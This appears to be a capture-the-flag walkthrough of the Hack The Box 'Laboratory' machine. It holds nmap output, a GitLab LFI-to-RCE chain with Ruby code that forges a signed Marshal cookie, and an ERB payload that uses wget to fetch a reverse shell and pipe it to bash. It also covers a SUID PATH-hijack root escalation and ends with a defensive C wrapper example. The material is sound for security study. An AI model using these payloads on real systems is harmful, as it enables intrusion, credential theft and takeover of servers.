Starting Nmap 7.91 ( ) at 2020-11-15 01:48 MST
Nmap scan report for
Host is up (0.056s latency).
Not shown: 65532 filtered ports
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 25:ba:64:8f:79:9d:5d:95:97:2c:1b:b2:5e:9b:55:0d (RSA)
| 256 28:00:89:05:55:f9:a2:ea:3c:7d:70:ea:4d:ea:60:0f (ECDSA)
|_ 256 77:20:ff:e9:46:c0:68:92:1a:0b:21:29:d1:53:aa:87 (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Laboratory
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after: 2024-03-03T10:39:28
| tls-alpn:
|_ http/1.1
Service Info: Host: laboratory.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 254.92 seconds

Using this vuln:

I use the LFI to steal the secret key (essentially a seed) and then bring up a local instance loaded with that same key. The local instance is effectively an exact copy of the target's application, so the two generate identical cookies. Using those cookies, I can run shell commands as the git user.

1. Create account on Gitlab

2. Create 2 projects

3. Create an issue using the LFI vuln to get /var/opt/gitlab/gitlab-rails/etc/secrets.yml

4. Create your own Gitlab 12.8.1 instance

5. On your own system update /etc/gitlab/gitlab-secrets.json with the secret

6. Run the following to get the git user on the HTB box to execute commands. In this case it downloads a reverse shell and then executes it.

request =
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_jar
erb ="<%= ` [command here] ` %>")
erb ="<%= ` wget --timeout 5 --tries 2-; bash` %>")
depr =, :result, "@result",
cookies.signed[:cookie] = depr
puts cookies[:cookie]

7. Send curl requests with the cookie to get the git user to execute the command.

curl -k 'https://git.laboratory.htb' -b "remember_user_token={output from cookie}"

8. Start the Rails console and update the password of user 1. Use those credentials to sign in to GitLab.

u = User.where(id:1).first

9. Find dexter's private key in securedocker

10. Sign in as dexter and get the user.txt flag.

11. Use a tool like or use "find" to locate programs with the SUID bit set. There is one program that "docker (UID 998)" is using.

12. Use strings to read the names of the programs it calls.

13. Make a malicious chmod program that launches a reverse shell.

14. Add the directory containing the malicious program to PATH: PATH={dir here}:$PATH

15. Run the docker-security program to get a root shell.

16. Own Root
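The PATH hijack in steps 11 to 15 works because the setuid helper runs a command by its bare name and inherits the caller's environment. As an added example (not the box's docker-security binary and not the author's code), this is how such a setuid wrapper can be written so that a directory prepended to PATH cannot redirect it: commands are resolved from a fixed allowlist of absolute paths and the child gets a fixed minimal environment. The paths /bin/chmod and /bin/ls are assumed locations.

```c
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Allowlist of commands the helper may run, each bound to an absolute path.
 * The caller's PATH is never consulted, so a directory prepended to PATH
 * (the trick in steps 11 to 15) cannot substitute a malicious "chmod".
 * The paths are assumed locations on a Debian/Ubuntu host. */
static const struct { const char *name; const char *path; } TRUSTED[] = {
    { "chmod", "/bin/chmod" },
    { "ls",    "/bin/ls" },
};

/* Resolve a bare command name to its allowlisted absolute path, or NULL. */
const char *trusted_command_path(const char *name)
{
    for (size_t i = 0; i < sizeof TRUSTED / sizeof TRUSTED[0]; i++)
        if (strcmp(TRUSTED[i].name, name) == 0)
            return TRUSTED[i].path;
    return NULL;
}

/* Fixed environment for the child: nothing is inherited from the caller,
 * so neither PATH nor loader variables such as LD_PRELOAD come from it. */
static char *const SAFE_ENV[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };

/* Run an allowlisted command; argv[0] is the bare command name.
 * Returns the child's exit status, or -1 if the name is not allowlisted
 * or the child could not be run. */
int run_trusted(char *const argv[])
{
    const char *path = trusted_command_path(argv[0]);
    if (path == NULL)
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(path, argv, SAFE_ENV);   /* absolute path and fixed env */
        _exit(127);                     /* only reached if execve failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

Real hardening also asks whether the helper needs the setuid bit at all; when it does, the allowlist plus a fixed environment removes the caller's control over what actually gets executed.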